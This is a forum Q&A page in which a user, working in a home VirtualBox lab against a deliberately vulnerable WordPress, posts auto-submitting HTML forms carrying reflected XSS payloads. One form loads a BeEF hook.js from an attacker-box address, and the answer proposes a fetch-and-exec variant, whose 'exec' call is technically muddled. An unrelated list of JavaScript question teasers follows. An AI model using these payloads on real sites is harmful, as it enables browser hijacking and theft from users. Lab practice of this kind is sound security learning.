Executing XSS Reflected Attack by Loading an External JS Script via POST Parameter

Experimenting with XSS attacks on my vbox machines, just for kicks! I have two .html files - one works and the other doesn't.

The file that works contains:

<html>
<head></head>
<body>
<form method="post" action="http://192.168.56.17/wordpress/wp-register.php" >
<input type="hidden" name="action" value="register" />
<input type="hidden" name="user_login" id="user_login"
value='"><script>alert(1)</script>' />
<input type="hidden" name="user_email" id="user_email"
value='"><script>alert(2)</script>' />
</form>
<script>document.forms[0].submit()</script>
</body>
</html>

is where the OWASPBWA machines of vulnhub are located, featuring an old WP installation with XSS vulnerability in register.php

This one works. When I open this .html file from a different client, say 192.168.56.1, I get the javascript alert!

However, when I try something more malicious, like hooking beef-xss, the following code doesn't work as expected:

<html>
<head></head>
<body>
<form method="post" action="http://192.168.56.17/wordpress/wp-register.php" >
<input type="hidden" name="action" value="register" />
<input type="hidden" name="user_login" id="user_login"
value='">example' />
<input type="hidden" name="user_email" id="user_email"
value='"><script src="http://192.168.56.101:3000/hook.js"></script>' />
</form>
<script>document.forms[0].submit()</script>
</body>
</html>

192.168.56.101 is where my attacking box is located.

Thank you for your assistance

javascriptxss

Answer №1

It is my belief that you should switch the order of these 2 lines

<input type="hidden" name="user_login" id="user_login" value='">example' />
<input type="hidden" name="user_email" id="user_email" value='"><script src="http://192.168.56.101:3000/hook.js"></script>' />

The issue lies in '">example', which disrupts the code and allows the script tag to take precedence.

Another possible scenario could be,

<input type="hidden" name="user_login" id="user_login" value='"><script>alert(1)</script>' />

If the above code functions correctly, then attempting the javascript exec("") command within the value attribute might be worthwhile. I am uncertain if the script->src actually retrieves the resource.

Something along these lines

<input type="hidden" name="user_login" id="user_login" value='"><script>
fetch(&apos;location to your script:3000/hook.js &apos;)
.then(
response => {
response.text()
.then(a=> exec(a))

}
)</script>' />

Explanation: Explicitly fetch the script using the fetch API, then execute the string with exec("").. &apos and &quot are escape characters for ' and " respectively.

That is the best solution I can come up with.

Similar questions

If you have not found the answer to your question or you are interested in this topic, then look at other similar questions below or use the search

How can I redirect to a different page with a keypress event in Next.js?

I am looking to implement a redirection function in nextjs when users press a key. There is a search input field where users can type and then hit the enter key to navigate to another page. Here's what I have attempted: const handleKeyPress = (e) = ...

javascriptnext.js

detect and handle errors when deploying the Node.js function

I'm currently attempting to use code I found on Github to insert data into a Firestore database, but unfortunately, I keep encountering an error. Here's the specific error message: 21:1 error Expected catch() or return promise/catch-or-re ...

javascriptnode.jsgoogle-cloud-firestore

How can I create a textbox in vue.js that only allows numeric input?

methods: { acceptNumber() { var x = this.value.replace(/\D/g, '').match(/(\d{0,3})(\d{0,3})(\d{0,4})/); this.value = !x[2] ? x[1] : '(' + x[1] + ')' + x[2] + (x[3] ? '-' + x[3] : & ...

javascriptregexvue.js

Creating a new array set by utilizing the map method

How can I filter and return a new array using the map function based on 2 conditions: The array must not be empty The role should be "moderator" This is an example of my initial response: Below is a React function that utilizes the map method to proces ...

javascriptarraysdictionaryreactjs

How to retrieve the value of a selected radio button in an AngularJS radio button group that uses ng-repeat

In the following code snippet, I am trying to retrieve the value when any of the radio buttons is selected: <label ng-repeat="SurveyType in SurveyTypes"> <input type="radio" name="SurveyTypeName" ng-model="surveyData.SurveyTypeN ...

javascriptjqueryangularjs

Styling Images with Gradient using CSS

Looking to create a unique effect on an image by adding a radial gradient that seamlessly fades into the background color. Despite my efforts, I haven't been able to achieve this using filters and my current code is a bit messy. Here's what I ha ...

javascripthtmlcssweb

Issue with Datatables FixedColumns plugin in IE8/7 and Firefox

I am encountering issues with the FixedColumn plugin on IE8, IE7, and Firefox. All of them are causing my table to malfunction, displaying the following error: Error: Invalid argument. Line: 566 Char: 3 Code: 0 URI: ./resources/javascript/dataTable/Fixed ...

javascriptjquerydatatables

Running tasks in the background with Express.js after responding to the client

Operating as a basic controller, this system receives user requests, executes tasks, and promptly delivers responses. The primary objective is to shorten the response time in order to prevent users from experiencing unnecessary delays. Take a look at the ...

javascriptnode.jsexpress

How to include a file within another file in Node.js

When including one JavaScript file into another, I typically use the following syntax: var userControllerObj = require("../controller/userController"), userController = new userControllerObj.UserGatewayController(); I'm curious if I can u ...

javascriptnode.jsexpress

Ways to invoke Java function using Javascript (Client-side)

I have a Java Swing application that handles the User Interface, but requires JavaScript files for hardware testing. The application calls a JavaScript engine to execute functions using the `InvokeFunction()` method. Currently, I am utilizing the LabJack ...

javascriptjava

Issues with Adding Dynamic Rows to MySQL

Struggling with adding dynamic rows and posting to MySQL. The variables seem off, but the script works fine. Need help with MYSQL posting specifically. As a beginner, I seek your forgiveness... The Script is running smoothly! <script type='text/ ...

javascriptphphtmlmysql

Arranging an Array of Arrays Containing Strings

Looking for a solution to sort an array containing arrays of strings? A similar issue was discussed here. Here is the array in question: var myArray = [ ['blala', 'alfred', '...'], ['jfkdj', ...

javascriptarraysnode.jssorting

Proper method for executing a synchronous AJAX POST request and subsequently submitting a form

Currently, I have an ASP submit button in my code. <asp:button runat="server" Text="Submit" id="btnSubmitOrder" OnClientClick="return SubmitOrder()" /> The JavaScript function I'm using, SubmitOrder(), is designed to execute a POST request. De ...

javascriptjqueryajax

Leveraging the power of Javascript/jQuery to manipulate form

On my website, I have implemented a form that requires a customized response for certain zip codes. To achieve this, I am developing a code that validates the first 3 digits of the entered zip code against a predefined array in my system. Although the code ...

javascriptjqueryarraysformsonblur

Retrieve data from a form on the server side using an Ajax request

I am currently working on submitting form data through an Ajax call. Here is the relevant form code: <form target="_blank" id="addCaseForm" class="form-horizontal col-md-12" action="" method="POST> <div class="form-group"> <labe ...

javascriptjqueryajaxnode.js

Encountered an error while trying to click the cookie button using Selenium: "object[] does not have a size or

I've been struggling to interact with a button inside a pop-up using Selenium, but I keep encountering this error: object [HTMLDivElement] has no size and location I initially tried to simply click the button since it is visible on the page and I wai ...

javascripthtmlseleniumselenium-webdriver

Showing C# File Content in JavaScript - A Step-by-Step Guide

Is there a way to showcase this File (c#) on a JavaScript site? return File(streams.First(), "application/octet-stream", Path.GetFileName(element.Path)); I am looking for something similar to this: <img id="myImg" src="_____&qu ...

javascriptc#filemodel-view-controller

Showing list data from script to template in vue - A step-by-step guide

My task involves displaying data from the main table in MySQL. I need to show the type of each major by comparing it with the id in the faculty table. I have successfully logged this information using console.log, but I'm unsure how to display it on t ...

javascriptvue.jsvuejs2

Tips for styling an array of objects using mapping techniques

I have an array of messages and I am currently using the map() function. Each message in the array has two keys - one for the author and another for the message content. What I want to achieve is to change the styles of the div tag when displaying the last ...

javascripthtmlcssreactjs

Titanium: Picture -> "automatically"

Imagine there is an image named hello.png with the dimensions of 200x100. A button is then created using this hello.png as shown below: var btn = Titanium.UI.createButton({ bottom : 50, backgroundImage : "images/hello.png", width:100, height:"auto"; }); w ...

javascriptimagetitaniumimage-size